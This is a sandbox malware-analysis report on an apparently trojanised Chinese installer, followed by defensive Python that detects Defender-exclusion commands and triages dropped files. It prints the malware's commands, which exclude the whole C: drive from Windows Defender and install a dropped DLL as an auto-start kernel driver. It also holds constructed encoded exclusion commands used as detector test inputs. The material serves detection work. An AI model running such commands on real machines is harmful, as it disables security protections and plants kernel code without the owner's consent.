Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Window / User API: threadDelayed 553
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Window / User API: threadDelayed 502
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe -> Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe -> API coverage: 7.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1020 -> Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe -> Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Code function: 7_2_6C0AB430 FindFirstFileA,FindClose, 7_2_6C0AB430
Source: C:\Program Files (x86)\Windows NT\7zr.exe -> Code function: 11_2_003C6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 11_2_003C6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe -> Code function: 11_2_003C7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 11_2_003C7496
Source: C:\Program Files (x86)\Windows NT\7zr.exe -> Code function: 11_2_003C9C60 GetSystemInfo, 11_2_003C9C60
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000002.2186157402.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Ja
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000002.2186157402.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Code function: 7_2_6BF33886 NtSetInformationThread 00000000,00000011,00000000,00000000 7_2_6BF33886
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Code function: 7_2_6C0C06F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_6C0C06F1
Source: C:\Program Files (x86)\Windows NT\7zr.exe -> Code function: 11_2_004457D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 11_2_004457D0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Code function: 7_2_6C0BF6ED mov eax, dword ptr fs:[00000030h] 7_2_6C0BF6ED
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Code function: 7_2_6C0CA2A5 mov eax, dword ptr fs:[00000030h] 7_2_6C0CA2A5
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Code function: 7_2_6C0CA2D6 mov eax, dword ptr fs:[00000030h] 7_2_6C0CA2D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Code function: 7_2_6C0B922D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_6C0B922D

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.13.dr -> Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe -> Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Code function: 7_2_6C187700 cpuid 7_2_6C187700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe -> Code function: 11_2_003CAB2A GetSystemTimeAsFileTime, 11_2_003CAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe -> Code function: 11_2_00460090 GetVersion, 11_2_00460090
MITRE ATT&CK Matrix (bracketed numbers are the superscript signature markers exactly as the report shows them; cells without a marker are the matrix's default technique entries)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Command and Scripting Interpreter [2]; Service Execution [1]; Native API [1]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Windows Service [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Access Token Manipulation [1]; Windows Service [1]; Process Injection [111]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading [11]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [231]; Access Token Manipulation [1]; Process Injection [111]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [1]; Security Software Discovery [421]; Virtualization/Sandbox Evasion [231]; Process Discovery [2]; Application Window Discovery [1]; System Owner/User Discovery [2]; File and Directory Discovery [3]; System Information Discovery [25]; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel [1]; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph (ID 1580391; sample #U5b89#U88c5#U52a9#U624b2.0.3.exe; start date 24/12/2024; architecture WINDOWS; score 84)

Sample-level signatures: Multi AV Scanner detection for dropped file; Found driver which could be used to inject code into processes; PE file contains section with special chars; Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Process tree (indentation shows the parent; dropped files and signatures are listed under the process they belong to; numbers in parentheses are the per-process counters drawn on the graph):

#U5b89#U88c5#U52a9#U624b2.0.3.exe (2)
  dropped: C:\...\#U5b89#U88c5#U52a9#U624b2.0.3.tmp, PE32
  #U5b89#U88c5#U52a9#U624b2.0.3.tmp (3 5)
    dropped: C:\Users\user\AppData\Local\...\update.vac, PE32
    dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
    signature: Adds a directory exclusion to Windows Defender
    #U5b89#U88c5#U52a9#U624b2.0.3.exe (2)
      dropped: C:\...\#U5b89#U88c5#U52a9#U624b2.0.3.tmp, PE32
      #U5b89#U88c5#U52a9#U624b2.0.3.tmp (4 16)
        dropped: C:\Users\user\AppData\Local\...\update.vac, PE32
        dropped: C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32
        dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
        dropped: C:\Program Files (x86)\Windows NT\7zr.exe, PE32
        signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger
        7zr.exe (2)
          dropped: C:\Program Files (x86)\...\tProtect.dll, PE32+
          conhost.exe
        7zr.exe (7)
          conhost.exe
        cmd.exe
    powershell.exe (23)
      signature: Loading BitLocker PowerShell Module
      conhost.exe
      WmiPrvSE.exe
cmd.exe
  sc.exe
    conhost.exe
      sc.exe
        conhost.exe
cmd.exe
  sc.exe (1)
    conhost.exe
29 other processes
  sc.exe (1), three instances, each with a conhost.exe child
  25 other processes
    conhost.exe
    24 other processes
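The graph above has the Inno Setup .tmp spawning powershell.exe, and the report attaches the "Adds a directory exclusion to Windows Defender" and "Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet" signatures to that step. The following is an added example, not Joe Sandbox's signature code and not the published Sigma rule: it re-implements the same detection idea in Python (match Add-/Set-MpPreference in plaintext, in the base64 of -EncodedCommand at any byte alignment, and in the decoded script) over constructed command lines. The exclusion path in the samples is the report's drop directory; the command lines themselves are made up.

```python
import base64
import binascii
import re
from typing import List, Optional

# Cmdlets that change Defender preferences; an -Exclusion* switch is the tell.
MP_CMDLETS = ("Add-MpPreference", "Set-MpPreference")
EXCLUSION_RE = re.compile(
    r"\b(?:Add|Set)-MpPreference\b[^\n;|]*?-Exclusion(?:Path|Process|Extension|IpAddress)\b",
    re.IGNORECASE,
)


def base64_offset_variants(text: str) -> List[str]:
    """Base64 substrings that match `text` (as UTF-16LE) at any of the 3 byte alignments.

    Characters whose value depends on unknown neighbouring bytes are trimmed, so each
    variant matches wherever the pattern sits inside a longer -EncodedCommand blob.
    """
    raw = text.encode("utf-16-le")
    variants = []
    for offset in range(3):
        enc = base64.b64encode(b"\x00" * offset + raw).decode("ascii").rstrip("=")
        head = (0, 2, 3)[offset]                       # chars tainted by the pad bytes
        tail = -1 if (offset + len(raw)) % 3 else None  # last char shares a byte with what follows
        variants.append(enc[head:tail])
    return variants


def _encoded_arguments(cmdline: str) -> List[str]:
    """Operands of -EncodedCommand: any unambiguous prefix (-e, -enc, ...) or the -ec alias."""
    tokens = cmdline.split()
    found = []
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in "-/":
            continue
        name = tok[1:].lower()
        if name and ("encodedcommand".startswith(name) or name == "ec"):
            found.append(tokens[i + 1].strip("'\""))
    return found


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand operand (base64 of UTF-16LE text); None if it is not one."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or len(raw) % 2:
        return None
    return raw.decode("utf-16-le", errors="replace")


def inspect_powershell_cmdline(cmdline: str) -> dict:
    """Classify one process-creation command line: {"flagged", "reasons", "decoded"}."""
    reasons = []
    decoded = None
    if EXCLUSION_RE.search(cmdline):
        reasons.append("plaintext MpPreference exclusion")
    for blob in _encoded_arguments(cmdline):
        # Alignment-independent substring check; needs no decoding at all.
        for cmdlet in MP_CMDLETS:
            if any(v in blob for v in base64_offset_variants(cmdlet)):
                reasons.append(f"base64-encoded {cmdlet}")
        decoded = decode_encoded_command(blob)
        if decoded and EXCLUSION_RE.search(decoded):
            reasons.append("decoded script adds a Defender exclusion")
    return {"flagged": bool(reasons), "reasons": reasons, "decoded": decoded}


def encode_for_powershell(script: str) -> str:
    """Build a -EncodedCommand operand the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not taken from the report's process list).
SAMPLES = {
    "benign": 'powershell.exe -NoProfile -Command "Get-Date"',
    "plain": 'powershell.exe -Command "Add-MpPreference -ExclusionPath \'C:\\Program Files (x86)\\Windows NT\'"',
    "encoded": "powershell.exe -ep bypass -ec "
    + encode_for_powershell("Add-MpPreference -ExclusionPath 'C:\\Program Files (x86)\\Windows NT'"),
    "encoded_prefix": "powershell.exe -EncodedCom "
    + encode_for_powershell("Set-MpPreference -ExclusionProcess '7zr.exe'"),
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(name, inspect_powershell_cmdline(line))
```

The offset trick matters because the base64 of a cmdlet name changes with its byte position in the script; three trimmed variants cover all alignments, which is why a single literal "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQA" string would miss a script that starts with something else.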

Antivirus detection (scanner: ReversingLabs)

Sample
  #U5b89#U88c5#U52a9#U624b2.0.3.exe: 0%

Dropped files
  C:\Program Files (x86)\Windows NT\7zr.exe: 0%
  C:\Program Files (x86)\Windows NT\hrsw.vbc: 24%
  C:\Program Files (x86)\Windows NT\tProtect.dll: 9%
  C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\_isetup\_setup64.tmp: 0%
  C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\update.vac: 24%
  C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\_isetup\_setup64.tmp: 0%
  C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\update.vac: 24%

No antivirus matches in the remaining three scanner sections
No contacted domains info

URLs found in the sample and its memory dumps (Name; Source; Malicious; Reputation)
  https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU  Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe  Malicious: false  Reputation: high
  https://www.remobjects.com/ps  Sources: #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2077742649.000000007F20B000.00000004.00001000.00020000.00000000.sdmp; #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2076986431.0000000002F80000.00000004.00001000.00020000.00000000.sdmp; #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000000.2079362946.00000000005C1000.00000020.00000001.01000000.00000004.sdmp; #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000000.2171788772.000000000109D000.00000020.00000001.01000000.00000008.sdmp; #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.dr; #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.dr  Malicious: false  Reputation: high
  https://www.innosetup.com/  Sources: same source list as the previous entry  Malicious: false  Reputation: high

No contacted IP infos
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580391
        Start date and time:2024-12-24 13:10:37 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 10m 37s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of new started processes analysed:108
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:#U5b89#U88c5#U52a9#U624b2.0.3.exe
        renamed because original name is a hash value
        Original Sample Name:2.0.3.exe
        Detection:MAL
        Classification:mal84.evad.winEXE@133/33@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 76%
        • Number of executed functions: 28
        • Number of non-executed functions: 77
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes were analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: #U5b89#U88c5#U52a9#U624b2.0.3.exe
        No simulations
        No context
Dropped file seen in other analyses (Joe Sandbox View)

Match: C:\Program Files (x86)\Windows NT\7zr.exe
Associated sample names (each analysis detected as malicious, threat name Unknown; the SHA 256 and link columns are not present in this extraction):
  #U5b89#U88c5#U52a9#U624b2.0.1.exe
  #U5b89#U88c5#U52a9#U624b2.0.6.exe
  #U5b89#U88c5#U52a9#U624b2.0.7.exe
  #U5b89#U88c5#U52a9#U624b2.0.4.exe
  #U5b89#U88c5#U52a9#U624b2.0.5.exe
  #U5b89#U88c5#U52a9#U624b2.0.2.exe
  #U5b89#U88c5#U52a9#U624b2.0.1.exe
  cVyexkZjrG.exe
  cVyexkZjrG.exe
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):831200
                          Entropy (8bit):6.671005303304742
                          Encrypted:false
                          SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                          MD5:84DC4B92D860E8AEA55D12B1E87EA108
                          SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                          SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                          SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Joe Sandbox View:
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.6.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.7.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.4.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.5.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious, Browse
                          • Filename: cVyexkZjrG.exe, Detection: malicious, Browse
                          • Filename: cVyexkZjrG.exe, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1926576
                          Entropy (8bit):7.99990648888762
                          Encrypted:true
                          SSDEEP:24576:6S/dQNKzV4tTimpkvIx+bSYfhQl17L075lY7SjPYLLRm5Ejypbemets9kl2kXKW9:6SFQN1xozfC/70DWKECiW9ZKlAvg
                          MD5:63172D15278B00589C32D8B0A2F876D9
                          SHA1:6677C180B516A02FA9CA8723F1AFFE4B2C75F24D
                          SHA-256:2B63CCE0AAEC9E0C7E47C840836AA8F085CDB28C557C406932756BD4F2D7356F
                          SHA-512:783E77E5130FBB3D17BFFCAE50839B50A8B2A1BB71474C801517A3C4CFDC16583FBFAF14DC8FFFB3158CF08E6F6A1FFCE37E24A390668092E2BA7FF3789E53F1
                          Malicious:false
                          Preview:.@S.....8...................I(....*..jU..m.s.............d...&\BH)X..w..T....s..b..-...........T.oBy......7.UGwO...,Q..^...^..T...d...`..ZS9G..C/...-(.;...:....<`...r-..B.E...|.-.h...Vp.].......xU......7.~....D..j.m..iN,L..K..U!...w.c.rS.........k.....u...C.....0.G...8.<e.x......5L..M.,}.a.kw....`...i.....AFt.dqY..*.8..ML..>.|..Z\7."X.S.X.k...wl.....d.....e.qp#....YO#.Uu.wC.................L7..$...5.H. \-I..md.............d............w...4-.....O.B.[.;.1.F"..T.My(.].L..5..~9r......;yK..u.....sa-....?.....M...r....N.b.u....2.E.Q.C.. .....5...GP...,.A...%;.f_<...D..Q.k.Y5.....k...0.1..L#...KB.....H....s...J..6.W.2..j...$..u>.L.(...P.....^.4.<...@..p...mra.J.h.....s...ep!.[Qv.K...3....~..Q.g.-=...".qA....k.i".G6.P..{..&1.*Xr..v..FF.O.mU.<@..a?.ELy.X.Y..._.(5.Y.?.....}g..\...a..........".#..q..2yC.....7....[...{.a..`.X7.T..e.|.....g_<b..Rr..x.0.....Ni.Kh......c...H........U|[.3.../a..2b!.....(..N....!...#1....nrD...lw.F..=.H..A.C.)..Z..c.3..Y...
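The per-file fields in these records (file type taken from the header bytes, size, 8-bit entropy with its Encrypted flag, MD5/SHA-1/SHA-256) can be reproduced offline, and the same pass catches the condition behind the report's "Drops files with a non-matching file extension" signature (PE bytes under names such as update.vac or hrsw.vbc). This is an added example, not Joe Sandbox's code: the 7.9 entropy cut-off and the small magic-number table are this example's assumptions, the sample bytes are constructed (pseudo-random payloads behind a magic prefix, not the dropped files' contents), and SSDEEP is left out because it needs the ssdeep library.

```python
import hashlib
import math
import random
from collections import Counter
from pathlib import PurePath
from typing import Dict, List

# Assumed header table: tag -> (magic bytes, extensions that legitimately carry that header).
MAGIC = {
    "PE": (b"MZ", {".exe", ".dll", ".sys", ".scr", ".ocx", ".tmp"}),
    "7-zip": (b"7z\xbc\xaf\x27\x1c", {".7z"}),
}
ENCRYPTED_ENTROPY = 7.9  # assumed cut-off; the report does not state its own threshold


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for empty or constant input, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def identify(data: bytes) -> str:
    """Tiny libmagic stand-in: 'PE', '7-zip' or 'data' (the report's wording for unknown bytes)."""
    for tag, (magic, _) in MAGIC.items():
        if data.startswith(magic):
            return tag
    return "data"


def triage(name: str, data: bytes) -> dict:
    """One report-style record for a file plus an extension-mismatch verdict."""
    kind = identify(data)
    entropy = shannon_entropy(data)
    ext = PurePath(name).suffix.lower()
    expected_exts = MAGIC[kind][1] if kind in MAGIC else set()
    return {
        "name": name,
        "file_type": kind,
        "size": len(data),
        "entropy": round(entropy, 4),
        "encrypted": entropy >= ENCRYPTED_ENTROPY,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        # A known header under a foreign extension (PE bytes in a .vac) is the mismatch case.
        "extension_mismatch": kind in MAGIC and ext not in expected_exts,
    }


def constructed_bytes(magic: bytes, size: int, seed: int) -> bytes:
    """Constructed sample content: a magic prefix followed by seeded pseudo-random bytes.

    It is not a valid PE or archive, only enough to exercise the header and entropy logic.
    """
    rng = random.Random(seed)
    return magic + rng.randbytes(size - len(magic))


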